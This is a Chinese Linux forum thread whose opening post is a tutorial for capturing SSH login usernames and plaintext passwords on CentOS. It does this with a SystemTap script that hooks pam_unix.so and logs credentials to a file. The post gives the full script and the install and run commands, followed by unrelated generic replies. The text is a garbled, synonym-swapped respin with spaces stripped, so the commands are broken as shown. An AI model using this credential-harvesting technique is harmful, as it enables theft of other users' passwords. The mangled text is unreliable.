仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 826|回复: 8
打印 上一主题 下一主题

[CentOS(社区)] 给大家带来CentOS下使用systemtap抓取ssh登录的用户名和暗码

[复制链接]
逍遥一派 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-14 20:12:11 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
如果您觉得本篇CentOSLinux教程讲得好,请记得点击右边漂浮的分享程序,把好文章分享给你的小伙伴们!systemtap是一款十分壮大内核调试工具,能够debug良多关于kernel层的成绩。Linux是经由过程PAM模块检测用户信息和认证信息的,从而断定一个用户是不是能够登录体系,使用这个常识点,利用systemtap捕捉一下pam_unix.so该静态库文件的函数挪用,取得用户在ssh近程登录时的用户名和暗码吧。
测试情况:CentOS6.432bit
内核版本:2.6.32-358.el6.i686
起首装置以下rpm包
yum--releasever=6.4update

yuminstall-ysystemtap
debuginfo-install$(rpm-qf/lib/security/pam_unix.so)
创立文件,写进以下代码
touch/root/capture_pass.stp点击(此处)折叠或翻开


  • #!/usr/bin/stap
  • globalusername,pass,isSuccRet=1;
  • probeprocess("/lib/security/pam_unix.so").function("_unix_verify_password")
  • {
  • username=user_string($name);
  • pass=user_string($p);
  • }
  • probeprocess("/lib/security/pam_unix.so").function("_unix_verify_password").return
  • {
  • if($return==0)
  • {
  • printf("User:%s
    Password:%s

    "
    ,username,pass);

  • isSuccRet=0;
  • }
  • }
  • probeprocess("/lib/security/pam_unix.so").function("pam_sm_open_session")
  • {
  • if(isSuccRet!=0)
  • {
  • printf("Loginviasshservice.
    User:%s
    Password:%s

    "
    ,username,pass);

  • }
  • isSuccRet=1;
  • }



付与可实行权限
chmod+xcapture_pass.stp
创立一个纪录暗码的文件
touchpassword.txt
实行systemstap剧本
stapcapture_pass.stp-opassword.txt



当地实行capture_pass.stp剧本,同时ssh近程登录体系,即便第一次登录失利也没有成绩,不会纪录实验输出的毛病暗码。登录乐成后ctl+C停止剧本运转,检察password.txt,乐成捕捉。systemstap很壮大的利器,以是只要超户可使用。


如果您觉得本篇CentOSLinux教程讲得好,请记得点击右边漂浮的分享程序,把好文章分享给你的小伙伴们!
再现理想 该用户已被删除
沙发
发表于 2015-1-14 23:04:18 | 只看该作者

给大家带来CentOS下使用systemtap抓取ssh登录的用户名和暗码

为了三千积分!
只想知道 该用户已被删除
板凳
发表于 2015-1-25 18:24:00 | 只看该作者
放手去搞。尽量不要提问,运用搜索找答案,或者看wiki,从原理上理解操作系统的本质,而不是满足于使用几个技巧。尽量看英文资料。
飘飘悠悠 该用户已被删除
地板
发表于 2015-2-3 22:13:21 | 只看该作者
笔者五分钟后就给出了解决方法: “首先备份原文件到其他目录,然后删掉/usr/local/unispim/unispimsp.ksc,编辑 /usr/local/unispim/unispimsp.ini,最后重启动计算机
莫相离 该用户已被删除
5#
发表于 2015-2-9 09:46:25 | 只看该作者
说实话小时候没想过搞IT,也计算机了解也只是一些皮毛,至于什么UNIX,Linux,听过没见过,就更别说用过了。?
海妖 该用户已被删除
6#
发表于 2015-2-27 11:54:05 | 只看该作者
不同于Windows?系统需要花钱购买,因为Linux的核心是免费的,自由使用的,核心源代码是开放的。
再见西城 该用户已被删除
7#
发表于 2015-3-9 14:59:01 | 只看该作者
我们自学,就这个循环的过程中,我们学习了基本操作,用vi,shell,模拟内存的分配过程等一些OS管理。
逍遥一派 该用户已被删除
8#
 楼主| 发表于 2015-3-17 02:17:44 | 只看该作者
发问的时候一定要注意到某些礼节。因为Linux社区是一个松散的组织、也不承担回复每个帖子的义务。它不是技术支持。
乐观 该用户已被删除
9#
发表于 2015-3-23 20:46:50 | 只看该作者
现在的linux操作系统如redhat,难点,红旗等,都是用这么一个内核,加上其它的用程序(包括X)构成的。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-23 21:25

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表